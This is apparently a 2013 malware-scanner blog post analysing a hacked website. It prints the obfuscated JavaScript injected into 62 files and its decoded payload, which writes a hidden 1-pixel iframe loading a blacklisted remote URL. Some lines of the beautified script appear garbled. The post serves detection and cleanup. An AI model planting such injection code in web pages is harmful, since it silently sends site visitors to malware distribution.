Tuesday, August 13, 2013

62 suspicious files on scanned website redirect visitors to malware

Website infected with malicious obfuscated JavaScript that injects iframes with malicious URL

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This compromised website has suspicious JavaScript code injected in 62 files. Malware was found on this website's pages by Google Safe Browsing and it included 12 exploits. Currently it appears as not suspicious in Google. Quttera website malware scanner detected hidden iframes that load content from the remote URL which is Blacklisted by Sucuri.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Thu Aug 8 04:46:54 2013
Infected website's files: 62
Website malware scan report link: Sitescan report link

Quttera website malware scanner
Quttera website malware scanner screenshot


Threat dump:

Detected malicious JavaScript on website
Quttera website malware scanner. Detected malicious JavaScript


Malware entry details

Beautified script

  1. try {
  2.     window.document.body++
  3. } catch (gdsgsdg) {
  4.     dbshre = 246;
  5. }
  6. if (dbshre) {
  7.     asd = 0;
  8.     try {
  9.         d = document.createElement("div");
  10.         d.innerHTML.a = "asd";
  11.     } catch (agdsg) {
  12.         asd = 1;
  13.     }
  14.     if (!asd) {
  15.         e = eval;
  16.     }
  17.     ss = String;
  18.     asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, 117, 8, 1, 24, 25, 26, 27, 109, 89,107, 26, 111, 92, 105, 90, 102, 27, 52, 24, 93, 105, 94, 108, 101, 94, 104, 111, 37, 91, 107, 95, 92, 107, 93, 62,102, 96, 100, 93, 103, 110, 35, 30, 97, 95, 108, 92, 100, 93, 32, 35, 54, 4, 2, 6, 4, 27, 23, 24, 25, 110, 96,104, 89, 101, 40, 110, 105, 91, 25, 55, 27, 30, 96, 109, 110, 107, 49, 39, 40, 93, 106, 102, 104, 102, 91, 111,105, 97, 113, 40, 100, 107, 39, 92, 102, 100, 90, 99, 94, 108, 41, 103, 96, 105, 33, 54, 4, 2, 25, 26, 27, 23,108, 94, 107, 92, 99, 38, 108, 110, 116, 99, 93, 39, 106, 106, 106, 97, 109, 99, 106, 101, 24, 54, 26, 34, 88, 90,108, 105, 103, 108, 108, 94, 33, 54, 4, 2, 25, 26, 27, 23, 108, 94, 107, 92, 99, 38, 108, 110, 116, 99, 93, 39,92, 106, 105, 92, 94, 108, 27, 52, 24, 32, 42, 34, 50, 5, 3, 26, 27, 23, 24, 109, 95, 108, 88, 100, 39, 109, 111,112, 100, 94, 40, 99, 92, 97, 96, 98, 111, 23, 53, 25, 33, 44, 103, 112, 32, 53, 8, 1, 24, 25, 26, 27, 107, 93,106, 91, 103, 37, 107, 109, 115, 103, 92, 38, 112, 99, 95, 107, 96, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3,26, 27, 23, 24, 109, 95, 108, 88, 100, 39, 109, 111, 112, 100, 94, 40, 103, 92, 94, 109, 26, 56, 23, 31, 42, 106,115, 30, 51, 6, 4, 27, 23, 24, 25, 110, 96, 104, 89, 101, 40, 110, 107, 113, 101, 95, 41, 107, 103, 105, 26, 56,23, 31, 42, 106, 115, 30, 51, 6, 4, 8, 1, 24, 25, 26, 27, 96, 94, 25, 34, 28, 91, 103, 92, 111, 104, 92, 102, 109,40, 98, 92, 108, 62, 102, 96, 100, 93, 103, 110, 61, 112, 65, 93, 34, 34, 107, 93, 106, 91, 103, 30, 33, 34, 26,118, 4, 2, 25, 26, 27, 23, 24, 25, 26, 27, 91, 103, 92, 111, 104, 92, 102, 109, 40, 114, 105, 97, 109, 95, 35, 30,52, 93, 99, 113, 23, 97, 93, 55, 87, 30, 108, 94, 107, 92, 99, 84, 32, 56, 55, 38, 92, 98, 112, 57, 30, 33, 52, 7,5, 23, 24, 25, 26, 27, 23, 24, 25, 94, 106, 90, 109, 102, 95, 105, 107, 38, 96, 95, 111, 60, 100, 94, 103, 96,101, 108, 59, 115, 68, 91, 32, 32, 110, 96, 104, 89, 101, 33, 36, 37, 89, 105, 106, 96, 101, 92, 60, 98, 100, 99,92, 33, 110, 96, 104, 89, 101, 35, 54, 4, 2, 25, 26, 27, 23, 117, 6, 4, 120, 32, 32, 34, 53);
  19.     s = "";
  20.     for (= 0; i - 494 != 0; i++) {
  21.         if ((020 == 0x10) % 26 % 26window.document) s += ss["fromCharCode"](1 * asgq[i] - (% 5 - 5 - 4));
  22.     }
  23.     z = s;
  24.     e(s);
  25. }

Malicious payload


Decoded payload generates hidden iframe to http://coopmatrix.it/clicker.php

  1. (function () {
  2.  
  3.     var teqal = document.createElement('iframe');
  4.  
  5.  
  6.  
  7.     teqal.src = 'http://coopmatrix.it/clicker.php';
  8.  
  9.     teqal.style.position = 'absolute';
  10.  
  11.     teqal.style.border = '0';
  12.  
  13.     teqal.style.height = '1px';
  14.  
  15.     teqal.style.width = '1px';
  16.  
  17.     teqal.style.left = '1px';
  18.  
  19.     teqal.style.top = '1px';
  20.  
  21.  
  22.  
  23.     if (!document.getElementById('teqal')) {
  24.  
  25.         document.write('<div id=\'teqal\'></div>');
  26.  
  27.         document.getElementById('teqal').appendChild(teqal);
  28.  
  29.     }
  30.  
  31. })();

Similar payload analyzed in the obfuscated malicious JavaScripts category on our blog.

Blacklisting status


URL in the iframe is Blacklisted by Sucuri labs

Sucuri screenshot



Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.